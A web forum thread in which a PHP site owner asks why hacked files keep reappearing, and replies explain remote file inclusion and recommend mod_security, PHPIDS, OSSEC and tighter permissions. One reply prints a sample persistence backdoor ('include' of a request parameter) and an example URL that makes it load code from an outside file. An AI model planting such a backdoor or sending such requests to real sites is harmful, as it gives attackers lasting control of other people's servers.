Hi, We have situation like on our server we have compromised most of things like allowed services from few IP only like FTP,Direct admin etc. We are using smarty technology with PHP,MYSQL. In our sites we have used only one folder permission 777 for smarty cache rest of files folder have 644 and 755 permission. In some requirement we have to generate pages html dynamically for CMS or for SEO purpose for that initially we were using PHP function in which we required to have public_html folder 777 permission which made problem to us and we got hacked so we have changed this code and used PHP FTP function. So basically we have created separate FTP user which we were using in code to generate pages , uploading images etc etc. Still we got hacked recently and some body have putted code in some files. We are just wondering how this happened cos we have everything IP based,we are sure nothing have been done internally by any one in team. Server admin is saying its happened via separate FTP user which we have created but in server logs nothing specific. So we come to conclusion not to use FTP function not using upload function of PHP as its required 777 permission. We have made FTP service OFF to keep observer still our files are got hacked and someone is putting some strange code in our files. Can any one help us with finding even though all restriction how some one is able to change code in our files. Thanks !!!
sure ! first let me talk about strange php codes you said ! after hackers come somewhere, for saving access to the server, they put php codes in your php files, like this for example : <?php include($[B]HostPersia[/B]); ?> Code (markup): imagine i put this code in your page2.php on your site, later after you deleted my webshells on your account, i can get my access BACK just like this : http://your-site.com/[COLOR="Red"]page2.php[/COLOR]?[B]HostPersia[/B]=http://devilcodez.txt? Code (markup): ( this is RFI = Remote File Inclusion ) so make sure, your scripts are clean ! after that, you are in shared host ??? so LOL !!! it's really easy to do works like this in servers are not secured well i suggest, just go on a secured server if you really need 777 directories, because if any other sites on the shared host got hacked, then you are hacked too... because hackers can get access on other accounts with just switching the directory ( imagine site xxx.com and yoursite.com are in same servers,then xxx.com hacked, the user public_html was here : /home/xxx/public_html, after that hackers upload a webshell and then try to access your home directory : /home/you/public_html and then they see 777 directory) i can help you if you need any security advices or need secured shared host
mod_security prevent rfi attacks ? are you sure ? because i don't think so, ofcourse you can just limit rfi attacks by using mod_security but it doesn't prevent them for xss and sql injection attacks i suggest DotDefender, and for rfi i suggest you to use secure php codes on your website and ofcourse being on a secured shared hosting.
This is not the problem on which you are working on. Your website is penetrate able means attack able. If you want some solution plz mail me at smartguy87(at)ymail(dot)com
Both of you dont know what your talking about. Mod_Security prevents a large amount of attacks, if the server security is setup correctly - RFI's should not be a worry at all.
If you don't know how to secure your PHP files and don't have access to the server to install mod_security... I'd recommend installing and trying PHPIDS (http://php-ids.org/). Here are 2 articles on how to setup PHPIDS: http://www.phpfreaks.com/tutorial/protecting-php-applications-with-phpids http://www.irongeek.com/i.php?page=security/phpids-install-notes
A good tool to use too is OSSEC ( ossec.net ) (free and open source). It will monitor your system and block most brute force attacks, web scanners, etc. Very simple to install and use.
Using 777 permission means you're asking for a problem. Use chown instead. Never had any problems with directories used for caching purposes.